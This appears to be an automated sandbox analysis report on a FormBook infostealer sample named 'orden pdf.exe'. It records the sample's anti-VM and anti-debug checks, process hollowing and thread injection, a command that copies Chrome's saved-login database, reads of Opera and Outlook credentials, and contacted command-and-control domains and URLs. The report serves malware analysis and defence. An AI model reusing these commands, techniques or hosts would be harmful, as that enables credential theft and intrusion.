Source: C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\systray.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\systray.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\systray.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\systray.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\systray.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Fxpx\cx9l_rq2dula.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Fxpx\cx9l_rq2dula.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\orden pdf.exe RDTSC instruction interceptor: First address: 00000000004098B4 second address: 00000000004098BA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\orden pdf.exe RDTSC instruction interceptor: First address: 0000000000409B2E second address: 0000000000409B34 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\systray.exe RDTSC instruction interceptor: First address: 00000000009398B4 second address: 00000000009398BA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\systray.exe RDTSC instruction interceptor: First address: 0000000000939B2E second address: 0000000000939B34 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains capabilities to detect virtual machines
Source: C:\Windows\System32\wscript.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_00409A60 rdtsc 2_2_00409A60
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\explorer.exe TID: 6660 Thread sleep time: -40000s >= -30000s
Source: C:\Windows\SysWOW64\systray.exe TID: 5592 Thread sleep time: -90000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001B6CA9 GetFileAttributesW,FindFirstFileW,FindClose, 0_2_001B6CA9
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001B60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose, 0_2_001B60DD
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001B63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose, 0_2_001B63F9
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001BEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_001BEB60
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001BF56F FindFirstFileW,FindClose, 0_2_001BF56F
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001BF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_001BF5FA
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001C1B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_001C1B2F
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001C1C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_001C1C8A
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_001B60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose, 1_2_001B60DD
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_001B63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose, 1_2_001B63F9
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_001BEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 1_2_001BEB60
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_001B6CA9 GetFileAttributesW,FindFirstFileW,FindClose, 1_2_001B6CA9
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_001BF56F FindFirstFileW,FindClose, 1_2_001BF56F
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_001BF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 1_2_001BF5FA
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_001C1B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 1_2_001C1B2F
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_001C1C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 1_2_001C1C8A
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_001C1F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 1_2_001C1F94
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_0018DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_0018DDC0
Source: explorer.exe, 00000003.00000000.267708421.000000000871F000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000003.00000000.267708421.000000000871F000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
Source: explorer.exe, 00000003.00000003.555421786.00000000089C5000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlluser
Source: explorer.exe, 00000003.00000000.266986539.0000000008640000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000000.265111863.0000000008220000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000003.00000000.257961088.00000000055D0000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
Source: explorer.exe, 00000003.00000000.267708421.000000000871F000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
Source: explorer.exe, 00000003.00000000.267708421.000000000871F000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000003.00000000.267948920.00000000087D1000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00ices
Source: explorer.exe, 00000003.00000000.258035922.0000000005603000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: explorer.exe, 00000003.00000000.265111863.0000000008220000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000003.00000000.265111863.0000000008220000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000003.00000000.265111863.0000000008220000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\Desktop\orden pdf.exe Process information queried: ProcessInformation

Anti Debugging:

Checks if the current process is being debugged
Source: C:\Users\user\Desktop\orden pdf.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\systray.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_00409A60 rdtsc 2_2_00409A60
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_0040AE10 LdrLoadDll, 2_2_0040AE10
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001C6AAF BlockInput, 0_2_001C6AAF
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_00173D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_00173D19
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001A3920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW, 0_2_001A3920
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_0018E01E LoadLibraryA,GetProcAddress, 0_2_0018E01E
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_3_014600AD mov ecx, dword ptr fs:[00000030h] 0_3_014600AD
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_3_014600AD mov eax, dword ptr fs:[00000030h] 0_3_014600AD
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_3_014601CB mov eax, dword ptr fs:[00000030h] 0_3_014601CB
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_0176B171 mov eax, dword ptr fs:[00000030h] 2_2_0176B171
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_0176B171 mov eax, dword ptr fs:[00000030h] 2_2_0176B171
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_0178B944 mov eax, dword ptr fs:[00000030h] 2_2_0178B944
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_0178B944 mov eax, dword ptr fs:[00000030h] 2_2_0178B944
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_0179513A mov eax, dword ptr fs:[00000030h] 2_2_0179513A
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_0179513A mov eax, dword ptr fs:[00000030h] 2_2_0179513A
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_01784120 mov eax, dword ptr fs:[00000030h] 2_2_01784120
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_01784120 mov eax, dword ptr fs:[00000030h] 2_2_01784120
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_01784120 mov eax, dword ptr fs:[00000030h] 2_2_01784120
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_01784120 mov eax, dword ptr fs:[00000030h] 2_2_01784120
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_01784120 mov ecx, dword ptr fs:[00000030h] 2_2_01784120
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_01769100 mov eax, dword ptr fs:[00000030h] 2_2_01769100
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_01769100 mov eax, dword ptr fs:[00000030h] 2_2_01769100
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001AA66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 0_2_001AA66C
Enables debug privileges
Source: C:\Users\user\Desktop\orden pdf.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\systray.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_00198189 SetUnhandledExceptionFilter, 0_2_00198189
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001981AC SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_001981AC
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_00198189 SetUnhandledExceptionFilter, 1_2_00198189
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_001981AC SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_001981AC
Source: C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exe Code function: 5_2_013981AC SetUnhandledExceptionFilter,UnhandledExceptionFilter, 5_2_013981AC

HIPS / PFW / Operating System Protection Evasion:

Benign windows process drops PE files
Source: C:\Windows\explorer.exe File created: cx9l_rq2dula.exe.3.dr
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 91.195.240.94 80
Source: C:\Windows\explorer.exe Network Connect: 3.223.115.185 80
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\orden pdf.exe Section loaded: unknown target: C:\Users\user\Desktop\orden pdf.exe protection: execute and read and write
Source: C:\Users\user\Desktop\orden pdf.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\orden pdf.exe Section loaded: unknown target: C:\Windows\SysWOW64\systray.exe protection: execute and read and write
Source: C:\Users\user\Desktop\orden pdf.exe Section loaded: unknown target: C:\Windows\SysWOW64\systray.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\systray.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\systray.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\orden pdf.exe Thread register set: target process: 3388
Source: C:\Windows\SysWOW64\systray.exe Thread register set: target process: 3388
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\orden pdf.exe Thread APC queued: target process: C:\Windows\explorer.exe
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\orden pdf.exe Section unmapped: C:\Windows\SysWOW64\systray.exe base address: C90000
Contains functionality to execute programs as a different user
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001AB106 LogonUserW, 0_2_001AB106
Contains functionality to launch a program with higher privileges
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_00173D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_00173D19
Contains functionality to simulate keystroke presses
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001B411C SendInput,keybd_event, 0_2_001B411C
Contains functionality to simulate mouse events
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001B74BB mouse_event, 0_2_001B74BB
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\orden pdf.exe Process created: C:\Users\user\Desktop\orden pdf.exe C:\Users\user\Desktop\orden pdf.exe
Source: C:\Users\user\Desktop\orden pdf.exe Process created: C:\Users\user\Desktop\orden pdf.exe C:\Users\user\Desktop\orden pdf.exe
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exe 'C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exe'
Source: C:\Windows\SysWOW64\systray.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\orden pdf.exe'
Source: C:\Windows\SysWOW64\systray.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001AA66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 0_2_001AA66C
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001B71FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 0_2_001B71FA
Source: explorer.exe, 00000003.00000000.239214907.0000000001398000.00000004.00000020.sdmp Binary or memory string: ProgmanamF
Source: explorer.exe, 00000003.00000002.601518850.0000000001980000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: orden pdf.exe, explorer.exe, 00000003.00000000.267708421.000000000871F000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000003.00000002.601518850.0000000001980000.00000002.00000001.sdmp Binary or memory string: Progman
Source: orden pdf.exe, 00000000.00000002.252510158.000000000021E000.00000002.00020000.sdmp, orden pdf.exe, 00000001.00000002.233175042.000000000021E000.00000002.00020000.sdmp, orden pdf.exe, 00000002.00000002.299374957.000000000021E000.00000002.00020000.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
Source: explorer.exe, 00000003.00000002.601518850.0000000001980000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001965C4 cpuid 0_2_001965C4
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001C091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW, 0_2_001C091D
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001EB340 GetUserNameW, 0_2_001EB340
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001A1E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, 0_2_001A1E8E
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_0018DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_0018DDC0
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected FormBook
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\systray.exe File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Tries to steal Mail credentials (via file access)
Source: C:\Windows\SysWOW64\systray.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
OS version to string mapping found (often used in BOTs)
Source: orden pdf.exe Binary or memory string: WIN_81
Source: orden pdf.exe Binary or memory string: WIN_XP
Source: orden pdf.exe, 00000002.00000002.299374957.000000000021E000.00000002.00020000.sdmp Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
Source: orden pdf.exe Binary or memory string: WIN_XPe
Source: orden pdf.exe Binary or memory string: WIN_VISTA
Source: orden pdf.exe Binary or memory string: WIN_7
Source: orden pdf.exe Binary or memory string: WIN_8

Remote Access Functionality:

Yara detected FormBook
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001C8C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket, 0_2_001C8C4F
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001C923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 0_2_001C923B
Behavior Graph

Behavior Graph ID: 339334 Sample: orden pdf.exe Startdate: 13/01/2021 Architecture: WINDOWS Score: 100

Signatures on the sample: Found malware configuration; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for dropped file; 8 other signatures

Process tree recovered from the graph:

orden pdf.exe (started)
  Dropped: C:\Users\user\...\DeviceCensus.exe.exe (PE32); C:\Users\user\AppData\Roaming\...\.url (MS)
  Signatures: Maps a DLL or memory area into another process
  orden pdf.exe (started)
    Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
    explorer.exe (injected)
      DNS/IP: www.hydrabadproperties.com 91.195.240.94, ports 49762, 49763, 49764, SEDO-ASDE, Germany; unbelievabowboutique.com 34.102.136.180, ports 49745, 80, GOOGLEUS, United States; 5 other IPs or domains
      Dropped: C:\Users\user\AppData\...\cx9l_rq2dula.exe (PE32); C:\Program Files (x86)\...\cx9l_rq2dula.exe (PE32)
      Signatures: System process connects to network (likely due to code injection or exploit); Benign windows process drops PE files
      systray.exe (started)
        Dropped: C:\Users\user\AppData\...\KN2logrv.ini (data); C:\Users\user\AppData\...\KN2logri.ini (data)
        Signatures: Detected FormBook malware; Tries to steal Mail credentials (via file access); Tries to harvest and steal browser information (history, passwords, etc); 3 other signatures
        cmd.exe (started)
          Dropped: C:\Users\user\AppData\Local\Temp\DB1 (SQLite)
          Signatures: Tries to harvest and steal browser information (history, passwords, etc)
          conhost.exe (started)
        cmd.exe (started)
          conhost.exe (started)
      wscript.exe (started)
        DeviceCensus.exe.exe (started)
          Signatures: Multi AV Scanner detection for dropped file
      cx9l_rq2dula.exe (started)
  orden pdf.exe (started)

Contacted Public IPs

IP Domain Country ASN ASN Name Malicious
91.195.240.94 unknown Germany 47846 SEDO-ASDE true
34.102.136.180 unknown United States 15169 GOOGLEUS true
3.223.115.185 unknown United States 14618 AMAZON-AESUS false

Contacted Domains

Name IP Active
unbelievabowboutique.com 34.102.136.180 true
HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com 3.223.115.185 true
www.hydrabadproperties.com 91.195.240.94 true
www.wwwswty6655.com unknown unknown
www.huro14.com unknown unknown
www.bepbosch.com unknown unknown
www.unbelievabowboutique.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.hydrabadproperties.com/n7ak/ true Avira URL Cloud: safe unknown
http://www.bepbosch.com/n7ak/ true Avira URL Cloud: safe unknown